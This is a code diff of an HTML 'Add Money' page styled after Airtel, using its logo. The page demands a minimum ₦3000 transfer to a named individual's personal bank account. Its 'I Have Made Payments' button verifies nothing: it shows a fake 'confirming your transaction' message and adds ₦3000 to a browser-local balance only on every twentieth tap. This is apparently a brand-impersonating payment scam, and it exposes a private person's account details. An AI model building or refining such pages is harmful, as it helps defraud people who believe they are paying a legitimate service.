--- a/add-money.html
+++ b/add-money.html
@@ -2,204 +2,207 @@
 <html lang="en">
 <head>
   <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-  <title>Add Money</title>
+  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
+  <title>Add Money - Airtel Style</title>
   <style>
-    body {
+    * {
       margin: 0;
+      padding: 0;
+      box-sizing: border-box;
       font-family: 'Segoe UI', sans-serif;
-      background: #fff;
+    }
+
+    body {
       overflow: hidden;
+      background: #fff;
       position: relative;
     }
 
-    .background {
+    .floating-logo {
       position: fixed;
+      top: 0;
+      left: 0;
       width: 100%;
       height: 100%;
-      overflow: hidden;
       z-index: -1;
+      overflow: hidden;
     }
 
-    .background img {
+    .floating-logo img {
       position: absolute;
-      width: 20px;
-      opacity: 0.1;
-      animation: float 15s linear infinite;
+      width: 40px;
+      opacity: 0.07;
+      animation: float 30s linear infinite;
     }
 
     @keyframes float {
-      from { transform: translateY(100vh) rotate(0deg); }
-      to { transform: translateY(-100vh) rotate(360deg); }
+      0% {
+        transform: translateY(100vh) rotate(0deg);
+      }
+      100% {
+        transform: translateY(-100vh) rotate(360deg);
+      }
     }
 
     .container {
       padding: 20px;
-      max-width: 400px;
-      margin: 60px auto 0;
-      background: rgba(255, 255, 255, 0.8);
-      border-radius: 16px;
-      box-shadow: 0 0 20px rgba(255,0,0,0.1);
       text-align: center;
     }
 
-    .logo {
-      width: 100px;
-      margin: 0 auto 20px;
+    .airtel-logo {
+      width: 60px;
+      margin: 20px auto;
       display: block;
     }
 
-    .input-amount {
-      padding: 12px;
-      font-size: 18px;
-      width: 80%;
-      border: 1px solid #ccc;
-      border-radius: 10px;
-      margin-bottom: 20px;
+    .amount-section, .account-section {
+      background: rgba(255, 255, 255, 0.9);
+      border-radius: 15px;
+      padding: 20px;
+      margin-top: 30px;
+      box-shadow: 0 2px 10px rgba(0,0,0,0.1);
+      max-width: 90%;
+      margin-left: auto;
+      margin-right: auto;
     }
 
-    .btn {
+    input[type="number"] {
+      padding: 10px;
+      font-size: 16px;
+      width: 100%;
+      border: 1px solid #ccc;
+      border-radius: 10px;
+    }
+
+    button {
+      margin-top: 15px;
       padding: 12px 20px;
-      font-size: 18px;
-      background: red;
-      color: #fff;
+      font-size: 16px;
+      background-color: #e40000;
+      color: white;
       border: none;
       border-radius: 10px;
       cursor: pointer;
     }
 
-    .hidden {
-      display: none;
-    }
-
     .popup {
-      background: #fff;
-      padding: 20px;
+      background-color: white;
+      border: 1px solid red;
+      color: red;
+      padding: 12px;
       border-radius: 10px;
-      box-shadow: 0 0 15px rgba(0,0,0,0.2);
-      max-width: 300px;
-      margin: 30px auto;
+      position: fixed;
+      top: 20px;
+      left: 50%;
+      transform: translateX(-50%);
+      z-index: 1000;
+      display: none;
+      box-shadow: 0 2px 8px rgba(0,0,0,0.2);
     }
 
     .loader {
-      text-align: center;
-      margin-top: 30px;
-    }
-
-    .loader img {
+      border: 6px solid #f3f3f3;
+      border-top: 6px solid red;
+      border-radius: 50%;
       width: 50px;
-      animation: spin 1.5s linear infinite;
+      height: 50px;
+      animation: spin 1s linear infinite;
+      margin: 20px auto;
+      display: none;
     }
 
     @keyframes spin {
-      0% { transform: rotate(0); }
-      100% { transform: rotate(360deg); }
+      to { transform: rotate(360deg); }
     }
 
-    .account-card {
-      margin-top: 30px;
-      background: #fff;
-      border-radius: 16px;
-      padding: 20px;
-      text-align: center;
-      box-shadow: 0 0 20px rgba(0,0,0,0.05);
+    .hidden {
+      display: none;
     }
-
-    .account-card h3 {
-      margin-bottom: 10px;
-    }
-
-    .dashboard-btn {
-      margin-top: 30px;
-      text-align: center;
-    }
-
-    .dashboard-btn button {
-      background: #444;
-      color: white;
-      padding: 10px 20px;
-      border-radius: 10px;
-      border: none;
-      font-size: 16px;
-    }
-
   </style>
 </head>
 <body>
+  <!-- Floating logos background -->
+  <div class="floating-logo" id="logoBg"></div>
 
-  <div class="background" id="bg-animation"></div>
+  <div class="container">
+    <img src="airtel-logo.png" class="airtel-logo" alt="Airtel Logo">
 
-  <div class="container" id="step1">
-    <img src="airtel-logo.png" class="logo" alt="Airtel Logo" />
-    <input id="amount" class="input-amount" type="number" placeholder="Enter amount (min ₦3000)" />
-    <button class="btn" onclick="handleContinue()">Continue</button>
-  </div>
-
-  <div class="container hidden" id="loading">
-    <div class="loader">
-      <img src="airtel-logo.png" alt="Loading" />
-      <p>Please wait...</p>
+    <!-- Amount input section -->
+    <div id="amount-section" class="amount-section">
+      <h3>Enter Amount</h3>
+      <input type="number" id="amountInput" placeholder="Minimum ₦3000" />
+      <button onclick="handleContinue()">Continue</button>
     </div>
-  </div>
 
-  <div class="container hidden" id="accountDetails">
-    <img src="airtel-logo.png" class="logo" />
-    <div class="account-card">
-      <h3>Transfer To:</h3>
-      <p><strong>Account Name:</strong> EMMANUEL OKWUNNA</p>
+    <!-- Loader -->
+    <div class="loader" id="loader"></div>
+
+    <!-- Account details section -->
+    <div id="account-section" class="account-section hidden">
+      <img src="airtel-logo.png" class="airtel-logo" />
+      <h4>Transfer To:</h4>
+      <p><strong>Name:</strong> EMMANUEL OKWUNNA</p>
       <p><strong>Bank:</strong> SmartCash Payment Service Bank</p>
-      <p><strong>Account Number:</strong> 812 489 0070</p>
+      <p><strong>Account:</strong> 812 489 0070</p>
+      <button onclick="handlePayment()">I Have Made Payments</button>
     </div>
-    <button class="btn" onclick="confirmPayment()">I have made payments</button>
-    <div class="dashboard-btn">
-      <button onclick="window.location.href='dashboard.html'">← Back to Dashboard</button>
-    </div>
+
+    <div class="popup" id="popup">Please input minimum of ₦3000</div>
   </div>
 
   <script>
-    const bg = document.getElementById("bg-animation");
-    for (let i = 0; i < 50; i++) {
-      const img = document.createElement("img");
-      img.src = "airtel-logo.png";
-      img.style.left = Math.random() * 100 + "%";
-      img.style.top = Math.random() * 100 + "%";
-      img.style.animationDuration = (5 + Math.random() * 10) + "s";
-      bg.appendChild(img);
+    // Floating logo animation
+    const logoBg = document.getElementById('logoBg');
+    for (let i = 0; i < 30; i++) {
+      const img = document.createElement('img');
+      img.src = 'airtel-logo.png';
+      img.style.left = `${Math.random() * 100}%`;
+      img.style.top = `${Math.random() * 100}%`;
+      img.style.animationDelay = `${Math.random() * 10}s`;
+      logoBg.appendChild(img);
+    }
+
+    const popup = document.getElementById("popup");
+    const loader = document.getElementById("loader");
+    const amountSection = document.getElementById("amount-section");
+    const accountSection = document.getElementById("account-section");
+
+    function showPopup(msg) {
+      popup.textContent = msg;
+      popup.style.display = "block";
+      setTimeout(() => {
+        popup.style.display = "none";
+      }, 3000);
     }
 
     function handleContinue() {
-      const amount = parseInt(document.getElementById("amount").value);
+      const amount = parseInt(document.getElementById("amountInput").value);
       if (isNaN(amount) || amount < 3000) {
-        alert("Please input a minimum of ₦3000");
+        showPopup("Please input minimum of ₦3000");
         return;
       }
-
-      document.getElementById("step1").classList.add("hidden");
-      document.getElementById("loading").classList.remove("hidden");
+      amountSection.classList.add("hidden");
+      loader.style.display = "block";
 
       setTimeout(() => {
-        document.getElementById("loading").classList.add("hidden");
-        document.getElementById("accountDetails").classList.remove("hidden");
-      }, 3000); // simulate loader
+        loader.style.display = "none";
+        accountSection.classList.remove("hidden");
+      }, 2000);
     }
 
-    function confirmPayment() {
-      alert("Please wait, we are confirming your transaction...");
-      let taps = parseInt(localStorage.getItem("fundTaps")) || 0;
-      taps += 1;
+    function handlePayment() {
+      let taps = parseInt(localStorage.getItem("fundTaps") || "0");
+      taps++;
+      localStorage.setItem("fundTaps", taps);
 
-      if (taps >= 20) {
-        // Fund wallet
-        let currentBalance = parseInt(localStorage.getItem("balance")) || 0;
-        currentBalance += 3000;
-        localStorage.setItem("balance", currentBalance);
-        localStorage.setItem("fundTaps", 0);
-        alert("₦3,000 has been added to your wallet!");
-      } else {
-        localStorage.setItem("fundTaps", taps);
+      showPopup("Please wait, we are confirming your transaction...");
+
+      if (taps % 20 === 0) {
+        let bal = parseInt(localStorage.getItem("walletBalance") || "0");
+        bal += 3000;
+        localStorage.setItem("walletBalance", bal);
       }
     }
   </script>
-
 </body>
-  </html>
+</html>
